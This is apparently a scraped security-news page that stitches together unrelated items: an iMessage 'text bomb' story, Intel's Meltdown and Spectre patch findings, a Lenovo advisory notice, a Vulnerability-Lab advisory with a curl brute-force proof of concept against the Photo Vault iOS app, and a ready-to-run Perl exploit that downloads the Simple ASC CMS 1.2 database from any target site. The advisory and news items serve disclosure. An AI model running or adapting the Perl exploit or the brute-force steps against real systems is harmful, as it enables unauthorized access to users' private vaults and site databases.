Since the initial report, Masri has removed the malicious code from his GitHub repository, but there is concern the code may be reposted elsewhere.

The bug’s impact on systems appears to be mostly a nuisance, with no reported side effects other than system freezes, crashes and restarts. Recipients of the malicious hyperlink need to quit the iMessaging app and delete the conversation to correct the problem.

According to Masri, the flaw takes advantage of Apple software developer guidelines that allowed a programmer to insert extra characters into a website’s HTML in order to customize the thumbnail image and title associated with hyperlink previews seen inside the iMessage app.

Masri was able to create iMessage “text bombs” by inputting hundreds of thousands of characters into a webpage’s metadata instead of just a few. That overloaded the app and caused iOS and MacOS to generate the multiple errors.

(This story was updated 1/19/18 at 2:30 pm ET to include Apple’s confirmation of a software fix.)

Intel – Meltdown and Spectre patches have a variable impact and can cause unwanted reboots

Intel – Meltdown and Spectre patches have a variable impact and can cause unwanted reboots

Meltdown and Spectre patches have a variable impact and can cause unwanted reboots, Intel warns

According to the tech giant systems with several types of processors running Meltdown and Spectre patches may experience more frequent reboots.

A few days ago Intel reported that extensive test conducted on home and business PCs demonstrated a negligible performance impact on these types of systems (from 2 up to 14%).

Now the vendor has conducted some performance tests on data centers and results show that the impact on the performance depends on the system configuration and the workload.

“As expected, our testing results to date show performance impact that ranges depending on specific workloads and configurations. Generally speaking, the workloads that incorporate a larger number of user/kernel privilege changes and spend a significant amount of time in privileged mode will be more adversely impacted.” reads the analysis conducted by Intel.

Impacts ranging from 0-2% on industry-standard measures of integer and floating point throughput, Linpack, STREAM, server-side Java and energy efficiency benchmarks. The tests are related to benchmarks that cover typical workloads for enterprise and cloud customers.

Intel also evaluated the impact on online transaction processing (OLTP), estimating it at roughly 4%.

Benchmarks for storage demonstrated a strict dependence on the benchmark, test setup, and system configuration.

For FlexibleIO, which simulates various I/O workloads, throughput performance decreased by 18% when the CPU was stressed, but there was no impact when CPU usage was low.

The tests for FlexibleIO were conducted using different benchmark simulating different types of I/O loads, the results depend on many factors, including read/write mix, block size, drives and CPU utilization.

“For FlexibleIO, a benchmark simulating different types of I/O loads, results depend on many factors, including read/write mix, block size, drives and CPU utilization. When we conducted testing to stress the CPU (100% write case), we saw an 18% decrease in throughput performance because there was not CPU utilization headroom.” continues the analysis. “When we used a 70/30 read/write model, we saw a 2% decrease in throughput performance. When CPU utilization was low (100% read case), as is the case with common storage provisioning, we saw an increase in CPU utilization, but no throughput performance impact.”

The most severe degradation of the performance was observed during Storage Performance Development Kit (SPDK) tests, using iSCSI the degradation reached 25% when only a single core was used. Fortunately, there was no degradation of the performance when SPDK vHost was used.

Meltdown and Spectre patches 

Intel also reported that Meltdown and Spectre patches are causing more frequent reboots, this behavior was observed for systems running Broadwell, Haswell, Ivy Bridge-, Sandy Bridge-, Skylake-, and Kaby Lake-based platforms.

“We have reproduced these issues internally and are making progress toward identifying the root cause. In parallel, we will be providing beta microcode to vendors for validation by next week,” said Navin Shenoy, executive vice president and general manager of Intel’s Data Center Group.

Only the newest Intel 8th-gen CPUs Coffee Lake seems to be not affected by reboots.

Pierluigi Paganini

(Security Affairs – Meltdown and Spectre patches, Intel)

http://securityaffairs.co/wordpress/67905/breaking-news/meltdown-and-spectre-patches.html

Lenovo Releases Security Advisory

Original release date: January 19, 2018

Lenovo has released security updates to address a vulnerability affecting Enterprise Network Operating System (ENOS) firmware. An attacker could exploit this vulnerability to obtain sensitive information.

NCCIC/US-CERT encourages users and administrators to review the Lenovo Security Advisory for more information and apply the necessary updates or mitigations.


This product is provided subject to this Notification and this Privacy & Use policy.

Photo Vault 1.2 Brute Forcing Issue

Document Title:
===============
Photo Vault v1.2 iOS – Insecure Authentication Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2110

Release Date:
=============
2018-01-16

Vulnerability Laboratory ID (VL-ID):
====================================
2110

Common Vulnerability Scoring System:
====================================
4.8

Vulnerability Class:
====================
Insecure Storage of Sensitive Information

Current Estimated Price:
========================
1.000a! – 2.000a!

Product & Service Introduction:
===============================
https://itunes.apple.com/us/app/id1053383947

Abstract Advisory Information:
==============================
The vulnerability labortory core research team discovered a insecure authentication issue in the official

Vulnerability Disclosure Timeline:
==================================
2018-01-16: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
PhotoRange
Product: Photo Vault – Mobile (Web-Application) 1.2

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Technical Details & Description:
================================
An insecure configuration vulnerability has been discovered in the official iOS mobile Photo Vault v1.2 iOS web-application.

The vulnerability is located in the login mechanism and password request communication. In case of the activated wifi
in the app it is possible to remotly access (http-server) the protected vault by a password. The password request is a
simple less protected attempt to the login.html file with `_` to split between the password and file. There is no
request limitation to block automated attacks.

Attackers can perform fast enumerate the password by simply audits against the http basic authentication mechanism.
Remote attackers can use an automated dictionary attack or compromise by manual basic http bruteforce attack via curl,
nmap or http-brute. Attackers can fast gain unauthorized access the private vault over the activated wifi web-application
in the same network. A second minor problem is that there is no https protocol activated for the wifi http-server
communication in the network. Taken together, these two problems pose a significant risk to users and individuals,
based on sensitive information stored in the vault of the mobile iOS application.

The security risk of the insecure authentication configuration vulnerability is estimated as medium with a cvss count of 4.8.
Exploitation of the vulnerability requires network access to connect to the web-server via wifi without user interaction.
Successful exploitation of the vulnerability results in unauthorized access to private vault data or sensitive information.

Proof of Concept (PoC):
=======================
The security issue can be exploited by remote attackers without privileged user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

PoC:
http_code=$(curl -L -data password=”passwdords.txt” “$url http://Localhost:9900/login.html__” -w ‘%{http_code}’ -o /root/fuzztime -s) #forensic

— PoC Session Logs [GET] —
GET http://localhost:9900/login.html
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://Localhost:9900/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:20 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked
Note: Requests first the login page

GET http://localhost:9900/login.html__passwd1
Host: Localhost:9900
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:9900/login.html
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Date: Sat, 06 Jan 2018 15:06:26 GMT
Accept-Ranges: bytes
Transfer-Encoding: chunked

Note: Access to vault of ios mobile application was cracked in a forensic access test within 15 minutes.

Reference(s):
http://localhost:9900/
http://localhost:9900/login.html
http://localhost:9900/login.html__

Security Risk:
==============
The security risk of the vulnerability in the mobile vault application is eastimated as medium (CVSS 4.8).

Credits & Authors:
==================
Benjamin K.M. [[email protected]] – https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com – www.vulnerability-db.com – www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php – vulnerability-lab.com/list-of-bug-bounty-programs.php – vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php – vulnerability-lab.com/rss/rss_upcoming.php – vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab – facebook.com/VulnerabilityLab – youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to get an ask permission.

Copyright A(c) 2018 | Vulnerability Laboratory – [Evolution Security GmbH]aC/


VULNERABILITY LABORATORY – ADMIN TEAM
SERVICE: www.vulnerability-lab.com

Simple ASC CMS 1.2 Database Disclosure

========================================================================
| # Title : Simple ASC CMS 1.2 Database Disclosure Exploit
| # Author : indoushka
| # email : [email protected]
| # Tested on : windows 8.1 FranASSais V.(Pro)
| # Vendor : http://www.aspsource.org
========================================================================

#!/usr/bin/perl -w
# Author : indoushka

use LWP::Simple;
use LWP::UserAgent;

system(‘cls’);
system(‘Simple ASC CMS 1.2 Database Disclosure Exploit’);
system(‘color a’);

if(@ARGV < 2)
{
print “[-]How To Use\n\n”;
&help; exit();
}
sub help()
{
print “[+] usage1 : perl $0 site.com /path/ \n”;
print “[+] usage2 : perl $0 localhost / \n”;
}
($TargetIP, $path, $File,) = @ARGV;

$File=”db/asc.mdb”;
my $url = “http://” . $TargetIP . $path . $File;
print “\n Fuck you wait!!! \n\n”;

my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,”:content_file” => “D:/asc.mdb”);

if ($request->is_success)
{
print “[+] $url Exploited!\n\n”;
print “[+] Database saved to D:/asc.mdb\n”;
exit();
}
else
{
print “[!] Exploiting $url Failed !\n[!] “.$request->status_line.”\n”;
exit();
}